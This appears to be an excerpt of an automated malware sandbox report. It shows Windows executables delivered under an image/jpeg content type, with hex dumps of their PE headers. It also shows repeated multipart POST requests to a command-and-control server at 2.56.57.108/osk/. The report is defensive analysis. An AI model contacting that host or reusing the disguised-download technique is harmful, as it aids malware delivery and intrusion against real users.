3b cb da 13 95 a9 d2 12 3b cb d2 13 e3 a9 d2 12 3b cb 2d 12 e3 a9 d2 12 3b cb d0 13 e3 a9 d2 12 52 69 63 68 e2 a9 d2 12 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 16 38 27 59 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 04 06 00 00 82 00 00 00 00 00 00 50 b1 03 00 00 10 00 00 00 20 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 d0 06 00 00 04 00 00 61 7a 07 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 f0 43 04 00 82 cf 01 00 f4 52 06 00 2c 01 00 00 00 80 06 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 78 06 00 38 3f 00 00 00 90 06 00 34 3a 00 00 f0 66 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 28 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 50 06 00 f0 02 00 00 98 40 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 72 03 06 00 00 10 00 00 00 04 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 10 28 00 00 00 20 06 00 00 18 00 00 00 08 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 36 14 00 00 00 50 06 00 00 16 00 00 00 20 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 70 06 00 00 02 00 00 00 36 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 03 00 00 00 80 06 00 00 04 00 00 00 38 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 34 3a 00 00 00 90 06 00 00 3c 00 00 00 3c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: http	Image file has PE prefix: HTTP/1.1 200 OK Date: Thu, 06 Jan 2022 06:57:30 GMT Server: Apache/2.4.12 (Win32) OpenSSL/1.0.1m PHP/5.3.29 mod_wsgi/4.4.11 Python/2.7.10 Last-Modified: Thu, 06 Jun 2019 04:01:44 GMT ETag: "1303d0-58a9fc5a65a00" Accept-Ranges: bytes Content-Length: 1246160 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: image/jpeg Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 23 83 34 8c 67 e2 5a df 67 e2 5a df 67 e2 5a df 6e 9a c9 df 73 e2 5a df be 80 5b de 65 e2 5a df f9 42 9d df 63 e2 5a df be 80 59 de 6a e2 5a df be 80 5f de 6d e2 5a df be 80 5e de 6c e2 5a df 45 82 5b de 6f e2 5a df ac 81 5b de 64 e2 5a df 67 e2 5b df 90 e2 5a df ac 81 5e de 6d e3 5a df ac 81 5a de 66 e2 5a df ac 81 a5 df 66 e2 5a df ac 81 58 de 66 e2 5a df 52 69 63 68 67 e2 5a df 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 ad 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 ea 0e 00 00 1e 04 00 00 00 00 00 77 f0 0e 00 00 10 00 00 00 00 0f 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 40 13 00 00 04 00 00 b7 bb 13 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 9d 11 00 88 a0 00 00 88 3d 12 00 54 01 00 00 00 b0 12 00 70 03 00 00 00 00 00 00 00 00 00 00 00 e6 12 00 d0 1d 00 00 00 c0 12 00 14 7d 00 00 70 97 11 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 97 11 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 81 e8 0e 00 00 10 00 00 00 ea 0e 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 10 52 03 00 00 00 0f 00 00 54 03 00 00 ee 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 74 47 00 00 00 60 12 00 00 22 00 00 00 42 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 70 03 00 00 00 b0 12 00 00 04 00 00 00 64 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 14 7d 00 00 00 c0 12 00 00 7e 00 00 00 68 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: http	Image file has PE prefix: HTTP/1.1 200 OK Date: Thu, 06 Jan 2022 06:57:31 GMT Server: Apache/2.4.12 (Win32) OpenSSL/1.0.1m PHP/5.3.29 mod_wsgi/4.4.11 Python/2.7.10 Last-Modified: Thu, 06 Jun 2019 04:02:02 GMT ETag: "14748-58a9fc6b90280" Accept-Ranges: bytes Content-Length: 83784 Keep-Alive: timeout=5, max=94 Connection: Keep-Alive Content-Type: image/jpeg Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 01 f9 a3 4e 45 98 cd 1d 45 98 cd 1d 45 98 cd 1d f1 04 22 1d 47 98 cd 1d 4c e0 5e 1d 4e 98 cd 1d 45 98 cc 1d 6c 98 cd 1d 9c fa c9 1c 55 98 cd 1d 9c fa ce 1c 56 98 cd 1d 9c fa c8 1c 41 98 cd 1d 9c fa c5 1c 5f 98 cd 1d 9c fa cd 1c 44 98 cd 1d 9c fa 32 1d 44 98 cd 1d 9c fa cf 1c 44 98 cd 1d 52 69 63 68 45 98 cd 1d 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 0c 38 27 59 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 ea 00 00 00 20 00 00 00 00 00 00 00 ae 00 00 00 10 00 00 00 00 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 40 01 00 00 04 00 00 bc 11 02 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 b0 f0 00 00 14 09 00 00 c0 10 01 00 8c 00 00 00 00 20 01 00 08 04 00 00 00 00 00 00 00 00 00 00 00 08 01 00 48 3f 00 00 00 30 01 00 94 0a 00 00 b0 1f 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 1f 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 e9 00 00 00 10 00 00 00 ea 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 44 06 00 00 00 00 01 00 00 02 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 b8 05 00 00 00 10 01 00 00 06 00 00 00 f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 08 04 00 00 00 20 01 00 00 06 00 00 00 f6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 0a 00 00 00 30 01 00 00 0c 00 00 00 fc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Posts data to a JPG file (protocol mismatch)

Source: unknown

HTTP traffic detected: POST /osk//6.jpg HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: 2.56.57.108Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://2.56.57.108/osk/

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: GBTCLOUDUS GBTCLOUDUS

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: POST /osk//6.jpg HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: 2.56.57.108Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
Source: global traffic	HTTP traffic detected: POST /osk//1.jpg HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: 2.56.57.108Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
Source: global traffic	HTTP traffic detected: POST /osk//2.jpg HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: 2.56.57.108Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
Source: global traffic	HTTP traffic detected: POST /osk//3.jpg HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: 2.56.57.108Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
Source: global traffic	HTTP traffic detected: POST /osk//4.jpg HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: 2.56.57.108Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
Source: global traffic	HTTP traffic detected: POST /osk//5.jpg HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: 2.56.57.108Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
Source: global traffic	HTTP traffic detected: POST /osk//7.jpg HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: 2.56.57.108Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
Source: global traffic	HTTP traffic detected: POST /osk//main.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: 2.56.57.108Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
Source: global traffic	HTTP traffic detected: POST /osk/ HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 87324Host: 2.56.57.108Connection: Keep-AliveCache-Control: no-cache

Downloads executable code via HTTP

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 06 Jan 2022 06:57:27 GMTServer: Apache/2.4.12 (Win32) OpenSSL/1.0.1m PHP/5.3.29 mod_wsgi/4.4.11 Python/2.7.10Last-Modified: Thu, 06 Jun 2019 04:01:52 GMTETag: "235d0-58a9fc6206c00"Accept-Ranges: bytesContent-Length: 144848Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: image/jpegData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 6c 24 1c e6 0d 4a 4f e6 0d 4a 4f e6 0d 4a 4f ef 75 d9 4f ea 0d 4a 4f 3f 6f 4b 4e e4 0d 4a 4f 3f 6f 49 4e e4 0d 4a 4f 3f 6f 4f 4e ec 0d 4a 4f 3f 6f 4e 4e ed 0d 4a 4f c4 6d 4b 4e e4 0d 4a 4f 2d 6e 4b 4e e5 0d 4a 4f e6 0d 4b 4f 7e 0d 4a 4f 2d 6e 4e 4e f2 0d 4a 4f 2d 6e 4a 4e e7 0d 4a 4f 2d 6e b5 4f e7 0d 4a 4f 2d 6e 48 4e e7 0d 4a 4f 52 69 63 68 e6 0d 4a 4f 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 bf 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 b6 01 00 00 62 00 00 00 00 00 00 97 bc 01 00 00 10 00 00 00 d0 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 50 02 00 00 04 00 00 09 b1 02 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 03 02 00 a8 00 00 00 b8 03 02 00 c8 00 00 00 00 30 02 00 78 03 00 00 00 00 00 00 00 00 00 00 00 18 02 00 d0 1d 00 00 00 40 02 00 60 0e 00 00 d0 fe 01 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 ff 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 d0 01 00 6c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 cb b4 01 00 00 10 00 00 00 b6 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 0a 44 00 00 00 d0 01 00 00 46 00 00 00 ba 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 07 00 00 00 20 02 00 00 04 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 30 02 00 00 04 00 00 00 04 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 60 0e 00 00 00 40 02 00 00 10 00 00 00 08 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 06 Jan 2022 06:57:28 GMTServer: Apache/2.4.12 (Win32) OpenSSL/1.0.1m PHP/5.3.29 mod_wsgi/4.4.11 Python/2.7.10Last-Modified: Sun, 06 Aug 2017 19:52:20 GMTETag: "9d9d8-5561b116cc500"Accept-Ranges: bytesContent-Length: 645592Keep-Alive: timeout=5, max=99Connection: Keep-AliveContent-Type: image/jpegData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 13 00 ea 98 3d 53 00 76 08 00 3f 0c 00 00 e0 00 06 21 0b 01 02 15 00 d0 06 00 00 e0 07 00 00 06 00 00 58 10 00 00 00 10 00 00 00 e0 06 00 00 00 90 60 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 20 09 00 00 06 00 00 38 c3 0a 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 b0 07 00 98 19 00 00 00 d0 07 00 4c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 fc 27 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 07 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac d1 07 00 70 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c0 ce 06 00 00 10 00 00 00 d0 06 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 30 60 2e 64 61 74 61 00 00 00 b0 0f 00 00 00 e0 06 00 00 10 00 00 00 d6 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 c0 2e 72 64 61 74 61 00 00 24 ad 00 00 00 f0 06 00 00 ae 00 00 00 e6 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 40 2e 62 73 73 00 00 00 00 98 04 00 00 00 a0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 40 c0 2e 65 64 61 74 61 00 00 98 19 00 00 00 b0 07 00 00 1a 00 00 00 94 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 4c 0a 00 00 00 d0 07 00 00 0c 00 00 00 ae 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 18 00 00 00 00 e0 07 00 00 02 00 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 f0 07 00 00 02 00 00 00 bc 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 fc 27 00 00 00 00 08 00 00 28 00 00 00 be 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 60 01 00 00 00 30 08 00 00 02 00 00 00 e6 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 c8 03 00 00 00 40 08 00 00 04 00 00 00 e8 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 35 00 00 00 00 00 4d 06 00 00 00 50 08 00 00 08 00 00 00 ec 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 35 31 00 00 00 00 00 60 43 00 00 00 60 08 00 00 44 00 00 00 f4 07 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 06 Jan 2022 06:57:28 GMTServer: Apache/2.4.12 (Win32) OpenSSL/1.0.1m PHP/5.3.29 mod_wsgi/4.4.11 Python/2.7.10Last-Modified: Thu, 06 Jun 2019 04:00:58 GMTETag: "519d0-58a9fc2e87280"Accept-Ranges: bytesContent-Length: 334288Keep-Alive: timeout=5, max=98Connection: Keep-AliveContent-Type: image/jpegData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 f0 2f 05 84 91 41 56 84 91 41 56 84 91 41 56 8d e9 d2 56 88 91 41 56 5d f3 40 57 86 91 41 56 1a 31 86 56 85 91 41 56 5d f3 42 57 80 91 41 56 5d f3 44 57 8f 91 41 56 5d f3 45 57 8f 91 41 56 a6 f1 40 57 80 91 41 56 4f f2 40 57 87 91 41 56 84 91 40 56 d6 91 41 56 4f f2 42 57 86 91 41 56 4f f2 45 57 c0 91 41 56 4f f2 41 57 85 91 41 56 4f f2 be 56 85 91 41 56 4f f2 43 57 85 91 41 56 52 69 63 68 84 91 41 56 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 d8 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 d8 03 00 00 66 01 00 00 00 00 00 29 dd 03 00 00 10 00 00 00 f0 03 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 05 00 00 04 00 00 a3 73 05 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 70 e6 04 00 50 00 00 00 c0 e6 04 00 c8 00 00 00 00 40 05 00 78 03 00 00 00 00 00 00 00 00 00 00 00 fc 04 00 d0 1d 00 00 00 50 05 00 e0 16 00 00 30 e2 04 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 88 e2 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 03 00 38 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 74 d6 03 00 00 10 00 00 00 d8 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 fc fe 00 00 00 f0 03 00 00 00 01 00 00 dc 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 